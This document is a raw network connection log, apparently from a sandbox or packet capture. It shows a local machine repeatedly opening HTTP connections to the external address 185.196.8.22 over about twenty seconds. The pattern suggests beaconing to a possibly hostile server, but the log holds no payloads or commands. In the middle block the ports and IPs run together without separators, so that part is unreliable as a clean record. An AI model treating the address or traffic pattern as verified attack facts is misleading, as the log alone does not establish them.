Jan 13, 2024 06:33:27.603199959 CET  49778  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:27.603542089 CET  49779  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:27.789688110 CET  80     49779  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:27.820477962 CET  80     49779  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:27.820650101 CET  49779  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:27.931664944 CET  49779  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:28.153575897 CET  80     49779  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:28.153639078 CET  49779  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:28.275796890 CET  49779  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:28.276503086 CET  49780  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:28.462400913 CET  80     49779  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:28.462490082 CET  49779  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:28.462631941 CET  80     49780  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:28.462763071 CET  49780  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:28.463033915 CET  49780  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:28.650403023 CET  80     49780  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:28.680557013 CET  80     49780  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:28.680632114 CET  49780  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:28.793498993 CET  49780  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:29.010036945 CET  80     49780  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:29.010130882 CET  49780  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:29.134993076 CET  49780  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:29.136028051 CET  49781  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:29.321089983 CET  80     49780  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:29.321178913 CET  49780  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:29.322022915 CET  80     49781  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:29.322164059 CET  49781  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:29.322546005 CET  49781  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:29.508713961 CET  80     49781  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:29.543780088 CET  80     49781  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:29.543917894 CET  49781  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:29.668488979 CET  49781  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:29.668973923 CET  49782  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:29.860640049 CET  80     49781  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:29.860747099 CET  80     49782  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:29.860766888 CET  49781  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:29.860959053 CET  49782  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:29.861105919 CET  49782  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:30.047925949 CET  80     49782  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:30.078883886 CET  80     49782  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:30.079193115 CET  49782  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:30.197848082 CET  49782  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:30.198523998 CET  49783  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:30.384403944 CET  80     49782  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:30.384632111 CET  49782  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:30.384982109 CET  80     49783  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:30.385070086 CET  49783  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:30.385277033 CET  49783  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:30.571357012 CET  80     49783  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:30.607637882 CET  80     49783  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:30.607708931 CET  49783  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:30.728986025 CET  49783  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:30.729684114 CET  49784  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:30.915194988 CET  80     49783  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:30.915276051 CET  49783  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:30.916121960 CET  80     49784  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:30.916209936 CET  49784  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:30.916450024 CET  49784  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:31.102711916 CET  80     49784  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:31.138622999 CET  80     49784  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:31.138822079 CET  49784  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:31.260840893 CET  49784  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:31.261670113 CET  49785  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:31.447643995 CET  80     49784  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:31.447758913 CET  49784  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:31.448488951 CET  80     49785  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:31.448687077 CET  49785  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:31.448833942 CET  49785  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:31.634954929 CET  80     49785  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:31.665730953 CET  80     49785  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:31.665934086 CET  49785  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:31.777925968 CET  49785  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:31.994685888 CET  80     49785  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:31.994889021 CET  49785  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:32.119760990 CET  49785  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:32.121184111 CET  49786  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:32.306755066 CET  80     49785  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:32.307013988 CET  49785  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:32.308044910 CET  80     49786  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:32.308305025 CET  49786  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:32.309164047 CET  49786  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:32.497107029 CET  80     49786  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:32.530930996 CET  80     49786  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:32.531034946 CET  49786  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:32.650978088 CET  49786  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:32.651592970 CET  49787  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:32.837107897 CET  80     49786  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:32.837332964 CET  49786  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:32.837802887 CET  80     49787  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:32.837907076 CET  49787  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:32.838264942 CET  49787  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:33.024691105 CET  80     49787  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:33.055308104 CET  80     49787  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:33.055397034 CET  49787  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:33.166934013 CET  49787  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:33.167613029 CET  49788  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:33.353589058 CET  80     49787  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:33.353775024 CET  49787  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:33.354150057 CET  80     49788  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:33.354237080 CET  49788  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:33.354623079 CET  49788  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:33.540823936 CET  80     49788  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:33.575634956 CET  80     49788  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:33.575783014 CET  49788  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:33.697894096 CET  49788  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:33.698581934 CET  49789  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:33.884569883 CET  80     49788  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:33.884646893 CET  49788  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:33.885468960 CET  80     49789  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:33.885576010 CET  49789  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:33.889100075 CET  49789  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:34.076008081 CET  80     49789  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:34.114600897 CET  80     49789  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:34.114814997 CET  49789  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:34.231781960 CET  49789  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:34.232362986 CET  49790  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:34.418263912 CET  80     49789  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:34.418411016 CET  49789  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:34.418726921 CET  80     49790  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:34.418942928 CET  49790  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:34.419281006 CET  49790  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:34.606770992 CET  80     49790  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:34.637278080 CET  80     49790  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:34.637639046 CET  49790  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:34.806804895 CET  49790  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:34.807111979 CET  49791  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:34.993197918 CET  80     49790  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:34.993268967 CET  80     49791  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:34.993453979 CET  49791  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:34.993539095 CET  49790  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:34.993797064 CET  49791  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:35.179886103 CET  80     49791  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:35.214732885 CET  80     49791  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:35.214924097 CET  49791  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:36.790277958 CET  49791  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:36.791013956 CET  49792  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:36.976917028 CET  80     49791  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:36.977010012 CET  49791  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:36.977756023 CET  80     49792  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:36.977840900 CET  49792  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:36.978112936 CET  49792  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:37.164254904 CET  80     49792  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:37.200464964 CET  80     49792  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:37.200567007 CET  49792  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:37.322170019 CET  49792  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:37.322556019 CET  49793  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:37.509646893 CET  80     49792  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:37.509711027 CET  80     49793  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:37.509824991 CET  49792  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:37.509908915 CET  49793  80     192.168.2.4   185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:37.510318041 CET4979380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:37.696787119 CET8049793185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:37.727576971 CET8049793185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:37.727857113 CET4979380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:37.856388092 CET4979380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:37.857151985 CET4979480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:38.042759895 CET8049793185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:38.042994976 CET4979380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:38.043510914 CET8049794185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:38.043601990 CET4979480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:38.044367075 CET4979480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:38.230731964 CET8049794185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:38.266396999 CET8049794185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:38.266680002 CET4979480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:38.394239902 CET4979480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:38.395602942 CET4979580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:38.580713034 CET8049794185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:38.580899954 CET4979480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:38.581846952 CET8049795185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:38.581979990 CET4979580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:38.582840919 CET4979580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:38.768882036 CET8049795185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:38.799787998 CET8049795185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:38.799866915 CET4979580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:38.920867920 CET4979580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:38.921370029 CET4979680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:39.107454062 CET8049795185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:39.107517004 CET8049796185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:39.107553959 CET4979580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:39.107606888 CET4979680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:39.107883930 CET4979680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:39.294015884 CET8049796185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:39.329850912 CET8049796185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:39.329920053 CET4979680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:39.454591990 CET4979680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:39.455255985 CET4979780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:39.640718937 CET8049796185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:39.640841007 CET4979680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:39.641350985 CET8049797185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:39.641592979 CET4979780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:39.641729116 CET4979780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:39.828012943 CET8049797185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:39.858006954 CET8049797185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:39.858208895 CET4979780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:39.983839035 CET4979780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:39.984318972 CET4979880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:40.170248032 CET8049797185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:40.170317888 CET8049798185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:40.170404911 CET4979880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:40.170456886 CET4979780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:40.170829058 CET4979880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:40.358386993 CET8049798185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:40.394274950 CET8049798185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:40.394444942 CET4979880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:40.525578022 CET4979880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:40.526031017 CET4979980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:40.711922884 CET8049798185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:40.712145090 CET4979880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:40.712388039 CET8049799185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:40.712522984 CET4979980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:40.713318110 CET4979980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:40.899255991 CET8049799185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:40.930108070 CET8049799185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:40.930258036 CET4979980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:41.064013004 CET4979980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:41.065376043 CET4980080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:41.251234055 CET8049799185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:41.251306057 CET4979980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:41.252362967 CET8049800185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:41.252453089 CET4980080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:41.253204107 CET4980080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:41.440790892 CET8049800185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:41.475627899 CET8049800185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:41.475699902 CET4980080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:41.595482111 CET4980080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:41.812356949 CET8049800185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:41.812414885 CET4980080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:41.931997061 CET4980080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:41.932715893 CET4980180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:42.118005991 CET8049800185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:42.118181944 CET4980080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:42.118832111 CET8049801185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:42.119045019 CET4980180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:42.119170904 CET4980180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:42.306890965 CET8049801185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:42.347152948 CET8049801185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:42.347481966 CET4980180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:42.463112116 CET4980180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:42.463593960 CET4980280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:42.649461985 CET8049801185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:42.649574995 CET4980180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:42.649846077 CET8049802185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:42.650194883 CET4980280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:42.650336981 CET4980280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:42.836405039 CET8049802185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:42.867069960 CET8049802185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:42.867206097 CET4980280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:42.979331017 CET4980280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:43.200664997 CET8049802185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:43.200958014 CET4980280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:43.322757959 CET4980280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:43.323262930 CET4980380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:43.509552956 CET8049802185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:43.509586096 CET8049803185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:43.509836912 CET4980380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:43.509851933 CET4980280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:43.510046005 CET4980380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:43.695882082 CET8049803185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:43.726180077 CET8049803185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:43.726236105 CET4980380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:43.838408947 CET4980380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:44.055813074 CET8049803185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:44.055990934 CET4980380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:44.183020115 CET4980380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:44.184415102 CET4980480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:44.368886948 CET8049803185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:44.368940115 CET4980380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:44.370335102 CET8049804185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:44.370398998 CET4980480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:44.370754004 CET4980480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:44.556660891 CET8049804185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:44.591407061 CET8049804185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:44.594125032 CET4980480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:44.715099096 CET4980480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:44.717695951 CET4980580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:44.902287960 CET8049804185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:44.902359962 CET4980480192.168.2.4185.196.8.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 13, 2024 06:33:44.905286074 CET | 80 | 49805 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:44.905477047 CET | 49805 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:44.905829906 CET | 49805 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:45.092017889 CET | 80 | 49805 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:45.125348091 CET | 80 | 49805 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:45.125545025 CET | 49805 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:45.244316101 CET | 49805 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:45.244868994 CET | 49806 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:45.430573940 CET | 80 | 49805 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:45.430787086 CET | 49805 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:45.430983067 CET | 80 | 49806 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:45.431200027 CET | 49806 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:45.431524992 CET | 49806 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:45.617451906 CET | 80 | 49806 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:45.648302078 CET | 80 | 49806 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:45.648571968 CET | 49806 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:45.777637005 CET | 49806 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:45.778187990 CET | 49807 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:45.963848114 CET | 80 | 49806 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:45.964087009 CET | 49806 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:45.964309931 CET | 80 | 49807 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:45.964390993 CET | 49807 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:45.964760065 CET | 49807 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:46.150558949 CET | 80 | 49807 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:46.186628103 CET | 80 | 49807 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:46.186713934 CET | 49807 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:46.311291933 CET | 49807 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:46.312125921 CET | 49808 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:46.497473955 CET | 80 | 49807 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:46.497575998 CET | 49807 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:46.497874022 CET | 80 | 49808 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:46.498080969 CET | 49808 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:46.498207092 CET | 49808 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:46.684067011 CET | 80 | 49808 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:46.714344025 CET | 80 | 49808 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:46.714437008 CET | 49808 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:46.826745033 CET | 49808 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:47.043061018 CET | 80 | 49808 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:47.043266058 CET | 49808 | 80 | 192.168.2.4 | 185.196.8.22
